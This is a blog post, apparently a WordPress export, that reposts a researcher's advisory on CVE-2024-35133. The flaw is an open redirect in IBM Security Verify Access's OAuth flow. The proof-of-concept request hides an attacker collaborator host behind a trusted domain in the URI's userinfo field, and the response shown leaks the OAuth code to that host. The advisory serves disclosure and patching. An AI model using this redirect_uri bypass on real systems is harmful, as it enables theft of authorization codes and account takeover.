{"id":62591,"date":"2025-04-09T04:54:08","date_gmt":"2025-04-09T01:24:08","guid":{"rendered":"https:\/\/afaghhosting.net\/blog\/ibm-security-verify-access-10-0-0-open-redirect-during-oauth-flow\/"},"modified":"2025-04-09T04:54:08","modified_gmt":"2025-04-09T01:24:08","slug":"ibm-security-verify-access-10-0-0-open-redirect-during-oauth-flow","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/ibm-security-verify-access-10-0-0-open-redirect-during-oauth-flow\/","title":{"rendered":"IBM Security Verify Access 10.0.0 &#8211; Open Redirect during OAuth Flow"},"content":{"rendered":"<p><\/p>\n<div>\n<pre><code class=\"language-NA\" style=\"white-space: pre-wrap;\">- IBM Security Verify Access &gt;= 10.0.0  ================================================&#13;\n&#13;\n  0. Overview&#13;\n  1. Detailed Description&#13;\n  2. Proof Of Concept&#13;\n  3. Solution&#13;\n  4. Disclosure Timeline&#13;\n  5. References&#13;\n  6. Credits&#13;\n  7. Legal Notices&#13;\n&#13;\n========  ======================================================&#13;\n&#13;\n  Revision:&#13;\n    1.0&#13;\n&#13;\n  Impact:&#13;\n    By persuading a victim to visit a specially crafted Web site, a remote &#13;\n    attacker could exploit this vulnerability to spoof the URL displayed &#13;\n    to redirect a user to a malicious Web site that would appear to be&#13;\n    trusted. This could allow the attacker to obtain highly sensitive &#13;\n    information or conduct further attacks against the victim.&#13;\n&#13;\n  Severity:&#13;\n    NIST: High&#13;\n    IBM: Medium&#13;\n&#13;\n  CVSS Score:&#13;\n    NIST 8.2 (CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:C\/C:H\/I:L\/A:N)&#13;\n    IBM 6.8 (CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:R\/S:C\/C:N\/I:H\/A:N)&#13;\n&#13;\n  CVE-ID:&#13;\n    CVE-2024-35133&#13;\n&#13;\n  Vendor:&#13;\n    IBM&#13;\n&#13;\n  Affected Products:&#13;\n    IBM Security Verify Access&#13;\n    IBM Security Verify Access Docker&#13;\n&#13;\n  Affected Versions:&#13;\n    10.0.0 - 10.0.8&#13;\n&#13;\n  Product Description:&#13;\n&#13;\n    IBM Security Verify Access is a complete authorization and network&#13;\n    security policy management solution. It provides end-to-end protection&#13;\n    of resources over geographically dispersed intranets and extranets.&#13;\n&#13;\n    In addition to state-of-the-art security policy management, IBM Security&#13;\n    Verify Access provides authentication, authorization, data security, and&#13;\n    centralized resource management capabilities.&#13;\n&#13;\n    IBM Security Verify Access offers the following features:&#13;\n    Authentication ~ Provides a wide range of built-in authenticators and&#13;\n    supports external authenticators.&#13;\n&#13;\n    Authorization ~ Provides permit and deny decisions for protected resources&#13;\n    requests in the secure domain through the authorization API.&#13;\n&#13;\n    Data security and centralized resource management ~ Manages secure access&#13;\n    to private internal network-based resources by using the public Internet's&#13;\n    broad connectivity and ease of use with a corporate firewall system.&#13;\n&#13;\n========  ==========================================&#13;\n&#13;\n  During a Penetration Test of the OAuth flow for a client, it was found an&#13;\n  Open Redirect vulnerability that can led to the leakage of the OAuth \"code\" variable.&#13;\n&#13;\n  It was possible to bypass the parser's logic responsible for verifying the&#13;\n  correctness and the validity of the \"redirect_uri\" parameter during an OAuth&#13;\n  flow by leveraging RFC 3986 (3.2.1) providing a username and password directly &#13;\n  in the Uniform Resource Identifier (URI). &#13;\n&#13;\n  By providing as the \"username\" field a legitimate and expected domain, it &#13;\n  was possible to bypass the whitelist filter used by \"IBM Security Verify Access\"&#13;\n  and cause an Open Redirect to any arbitrary domain controlled by the attacker, &#13;\n  not only altering the expected flow and redirect a user to a malicious &#13;\n  Web site that would appear to be trusted. &#13;\n&#13;\n  This could allow the attacker to obtain highly sensitive like the OAuth \"code\" &#13;\n  token or conduct further attacks against the victim&#13;\n&#13;\n========  =============================================&#13;\n&#13;\n===== REQUEST =====&#13;\n&#13;\n[[&#13;\n  GET \/oauth\/oauth20\/authorize?response_type=code&amp;client_id=[REDACTED]&amp;state=001710863806728MPUw0xFSj&amp;REDACTED_uri=https:\/\/legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com\/[REDACTED]\/openid\/REDACTED\/[REDACTED]&amp;scope=openid+ HTTP\/1.1&#13;\n  Host: [REDACTED]&#13;\n  User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0&#13;\n  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8&#13;\n  Accept-Language: en-US,en;q=0.5&#13;\n  Accept-Encoding: gzip, deflate, br&#13;\n  Upgrade-Insecure-Requests: 1&#13;\n  Sec-Fetch-Dest: document&#13;\n  Sec-Fetch-Mode: navigate&#13;\n  Sec-Fetch-Site: same-origin&#13;\n  Sec-Fetch-User: ?1&#13;\n  Te: trailers&#13;\n  Connection: close&#13;\n]]&#13;\n&#13;\n===== RESPONSE =====&#13;\n&#13;\n[[&#13;\n  HTTP\/1.1 302 Found &#13;\n  content-language: en-US &#13;\n  date: Tue, 19 Mar 2024 16:04:35 GMT &#13;\n  location: https:\/\/legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com\/[REDACTED]\/openid\/REDACTED\/[REDACTED]?state=001710863806728MPUw0xFSj&amp;code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&amp;iss=[REDACTED] &#13;\n  p3p: CP=\"NON CUR OTPi OUR NOR UNI\" &#13;\n  x-frame-options: DENY &#13;\n  x-content-type-options: nosniff &#13;\n  cache-control: no-store &#13;\n  x-xss-protection: 1; mode=block &#13;\n  x-permitted-cross-domain-policies: none &#13;\n  cross-origin-resource-policy: same-site &#13;\n  content-security-policy: frame-ancestors 'none' &#13;\n  referrer-policy: no-referrer-when-downgrade &#13;\n  strict-transport-security: max-age=31536000; includeSubDomains &#13;\n  pragma: no-cache &#13;\n  Content-Length: 0.&#13;\n]]&#13;\n&#13;\n========  ======================================================&#13;\n&#13;\n  Refer to IBM Security Bulletin 7166712 for patch, upgrade or&#13;\n  suggested workaround information.&#13;\n&#13;\n  See \"References\" for more details.&#13;\n&#13;\n========  ===========================================&#13;\n&#13;\n  19\/03\/2024 - Vulnerability discovered by the Security Researcher (Giulio Garzia)&#13;\n  21\/03\/2024 - Vulnerability shared with the client who committed the &#13;\n\t\tPenetration Test on his infrastructure, relying on IBM SVA&#13;\n  02\/04\/2024 - Vulnerability shared with IBM&#13;\n  02\/04\/2024 - Vulnerability taken over by IBM&#13;\n  14\/05\/2024 - Vulnerability confirmed by IBM&#13;\n  18\/07\/2024 - Pre-release provided by IBM to the customer to verify the&#13;\n\t\tresolution of the vulnerability&#13;\n  27\/08\/2024 - Security Bulletin and vulnerability shared by IBM&#13;\n&#13;\n========  ====================================================&#13;\n&#13;\n  (1) https:\/\/www.ibm.com\/support\/pages\/security-bulletin-security-vulnerability-was-fixed-ibm-security-verify-access-cve-2024-35133&#13;\n  (2) https:\/\/exchange.xforce.ibmcloud.com\/vulnerabilities\/291026&#13;\n  (3) https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-35133&#13;\n  (4) https:\/\/cwe.mitre.org\/data\/definitions\/178.html&#13;\n &#13;\n========  =======================================================&#13;\n&#13;\n  This vulnerability was discovered and reported by:&#13;\n&#13;\n    Giulio Garzia 'Ozozuz'&#13;\n&#13;\n  Contacts:&#13;\n&#13;\n    https:\/\/www.linkedin.com\/in\/giuliogarzia\/&#13;\n    https:\/\/github.com\/Ozozuz&#13;\n&#13;\n========  ================================================&#13;\n&#13;\n  Copyright (c) 2024 Giulio Garzia \"Ozozuz\"&#13;\n&#13;\n  Permission is granted for the redistribution of this alert&#13;\n  electronically. It may not be edited in any way without mine express&#13;\n  written consent. If you wish to reprint the whole or any&#13;\n  part of this alert in any other medium other than electronically,&#13;\n  please email me for permission.&#13;\n&#13;\n  Disclaimer: The information in the advisory is believed to be accurate&#13;\n  at the time of publishing based on currently available information.&#13;\n  Use of the information constitutes acceptance for use in an AS IS&#13;\n  condition.&#13;\n  There are no warranties with regard to this information. Neither the&#13;\n  author nor the publisher accepts any liability for any direct,&#13;\n  indirect, or consequential loss or damage arising from use of,&#13;\n  or reliance on,this information.\n            <\/code><\/pre>\n<\/p><\/div>\n<p><a href=\"https:\/\/afaghhosting.net]\">\u0622\u0641\u0627\u0642 \u0647\u0627\u0633\u062a\u06cc\u0646\u06af \u0645\u062f\u06cc\u0631\u06cc\u062a \u0633\u0631\u0648\u0631 \u0645\u0634\u0627\u0648\u0631 \u0648 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646 \u0641\u0646\u06cc <\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&#8211; IBM Security Verify Access &gt;= 10.0.0 ================================================&#13; &#13; 0. Overview&#13; 1. Detailed Description&#13; 2. Proof Of Concept&#13; 3. Solution&#13; 4. Disclosure Timeline&#13; 5. References&#13; 6. Credits&#13; 7. Legal Notices&#13; &#13; ======== ======================================================&#13; &#13; Revision:&#13; 1.0&#13; &#13; Impact:&#13; By persuading a victim to visit a specially crafted Web site, a remote &#13; attacker could exploit &hellip;<\/p>\n","protected":false},"author":1,"featured_media":62562,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-62591","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/62591","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=62591"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/62591\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media\/62562"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=62591"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=62591"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=62591"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}